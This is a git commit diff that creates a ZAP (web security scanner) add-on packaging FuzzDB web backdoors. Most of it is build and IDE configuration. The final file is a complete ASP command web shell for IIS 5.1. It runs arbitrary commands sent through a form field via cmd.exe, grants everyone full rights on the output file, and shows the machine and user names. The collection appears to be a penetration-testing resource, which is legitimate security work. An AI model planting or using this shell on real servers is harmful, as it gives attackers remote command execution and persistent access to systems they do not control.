Initial point

Author: svkrclg

.classpath

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-10/"/>
+	<classpathentry kind="con" path="org.eclipse.buildship.core.gradleclasspathcontainer"/>
+	<classpathentry kind="output" path="bin/default"/>
+</classpath>

.gitignore

@@ -21,3 +21,4 @@
 
 # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
 hs_err_pid*
+/.gradle/

.project

@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>fuzzdb-web-backdoors</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.jdt.core.javabuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+		<buildCommand>
+			<name>org.eclipse.buildship.core.gradleprojectbuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.jdt.core.javanature</nature>
+		<nature>org.eclipse.buildship.core.gradleprojectnature</nature>
+	</natures>
+</projectDescription>

.settings/org.eclipse.buildship.core.prefs

@@ -0,0 +1,2 @@
+connection.project.dir=
+eclipse.preferences.version=1

.travis.yml

@@ -0,0 +1,14 @@
+language: java
+
+jdk:
+  - oraclejdk8
+  - openjdk11
+
+before_cache:
+  - rm -f  $HOME/.gradle/caches/modules-2/modules-2.lock
+  - rm -fr $HOME/.gradle/caches/*/plugin-resolution/
+
+cache:
+  directories:
+    - $HOME/.gradle/caches/
+    - $HOME/.gradle/wrapper/

CHANGELOG.md

@@ -0,0 +1,8 @@
+# Changelog
+All notable changes to this add-on will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
+
+## Unreleased
+
+First version.

build.gradle.kts

@@ -0,0 +1,39 @@
+import org.zaproxy.gradle.addon.AddOnStatus
+import org.zaproxy.gradle.addon.manifest.tasks.ConvertChangelogToChanges
+
+plugins {
+    `java-library`
+    eclipse
+    id("org.zaproxy.add-on") version "0.1.0"
+}
+
+eclipse {
+    classpath {
+        // Prevent compilation of zapHomeFiles.
+        sourceSets = listOf()
+    }
+}
+
+version = "1"
+description = "FuzzDB web backdoors which can be used with the ZAP fuzzer"
+
+val generateManifestChanges by tasks.registering(ConvertChangelogToChanges::class) {
+    changelog.set(file("CHANGELOG.md"))
+    manifestChanges.set(file("$buildDir/zapAddOn/manifest-changes.html"))
+}
+
+zapAddOn {
+    addOnName.set("FuzzDB Web Backdoors")
+    addOnStatus.set(AddOnStatus.RELEASE)
+    zapVersion.set("2.5.0")
+
+    manifest {
+        author.set("ZAP Dev Team")
+        url.set("https://github.com/fuzzdb-project/fuzzdb/")
+        changesFile.set(generateManifestChanges.flatMap { it.manifestChanges })
+    }
+
+    zapVersions {
+        downloadUrl.set("https://github.com/zaproxy/fuzzdb-web-backdoors/releases/download/v$version")
+    }
+}

gradle/gradle-wrapper.properties

@@ -0,0 +1,5 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-5.2.1-all.zip
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists

settings.gradle.kts

@@ -0,0 +1 @@
+rootProject.name = "fuzzdb-web-backdoors"

src/main/asp/cmd-asp-5.1.asp

@@ -0,0 +1,41 @@
+<%
+
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com 
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+
+
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" &  oFSys.GetTempName()
+  ' Here we do the command
+  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+"""",0,True)
+  response.write szTF
+  ' Change perms
+  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+  Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If 
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+<!--    http://michaeldaw.org   2006    -->